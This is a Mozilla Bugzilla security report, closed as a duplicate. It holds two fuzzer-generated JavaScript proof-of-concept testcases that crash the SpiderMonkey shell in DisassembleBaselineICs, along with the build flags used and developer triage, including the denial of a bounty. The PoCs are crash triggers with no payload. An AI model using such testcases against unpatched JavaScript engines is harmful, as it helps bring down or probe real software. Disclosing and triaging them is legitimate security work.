Closed Bug 1938914 Opened 2 months ago Closed 1 month ago

SEGV gecko-dev/js/src/builtin/TestingFunctions.cpp:1933:5 in DisassembleBaselineICs(JSContext*, unsigned int, JS::Value*)

Categories

(Core :: JavaScript Engine, defect)

defect

Tracking

()

RESOLVED DUPLICATE of bug 1937430

People

(Reporter: ddme, Unassigned)

Details

(Keywords: reporter-external, Whiteboard: [client-bounty-form])

Attachments

(1 file)

Attached file asan.txt

working on 22a0993169acd84ab8d574fefddcb4da04b77c91
build with

c_add_options --enable-application=js
ac_add_options --enable-optimize
ac_add_options --enable-debug
ac_add_options --disable-shared-js
ac_add_options --enable-js-fuzzilli
ac_add_options --enable-fuzzing
ac_add_options --enable-gczeal

and run with --ion-eager
POC

class C1 {
    ["XN"];
}
const v3 = -String;
gczeal(14);
x = [v3,v3,v3];
const v10 = new Uint8Array();
Array.prototype.push.call(x, v10);
function f16() {
    try {
        y.toString();
    } catch(e19) {
    }
    for (const v23 of [null,0]) {
        function f24() {
            const v25 = this;
            v25.disblic(f24);
            class C27 {
            }
            const v28 = C27.bind();
            try { v28(v25, v23); } catch (e) {}
            return v28;
        }
        f24();
    }
    return String;
}
Array.prototype.some.call(x, f16);
gc();
Flags: sec-bounty?

the other one

gczeal(14);
new Uint8Array();
for (const v7 of [null]) {
    function f8() {
        const v9 = this;
        v9.disblic(f8);
        class C11 {
        }
        const v12 = new C11();
        v12.__proto__;
        return f8;
    }
    const t12 = f8();
    t12();
}
gc();
Group: firefox-core-security → javascript-core-security
Component: Security → JavaScript Engine
Product: Firefox → Core
Flags: needinfo?(iireland)

This is unlikely to qualify for a bug bounty if the problem is in the testing functions. The js shell is handy for testing, but not technically covered by the bug bounty program -- the bugs have to exist in Firefox itself. Make sure you're using the fuzzing-safe arguments which turn off a lot of the extra functionality so the environment is closer to that of what a web page sees in firefox. for help check in the #fuzzing room on our Matrix server https://chat.mozilla.org

Hi, I have tested that it can trigger with --ion-eager --fuzzing-safe

This is a duplicate of bug 1937430. The reported failing build (22a0993169acd84ab8d574fefddcb4da04b77c91) does not contain the fix. (It looks like it landed later in the day on the 20th).

I reproduced the crashes on an older build, and verified that both testcases pass in an up-to-date build.

Group: javascript-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 1 month ago
Duplicate of bug: 1937430
Flags: needinfo?(iireland)
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: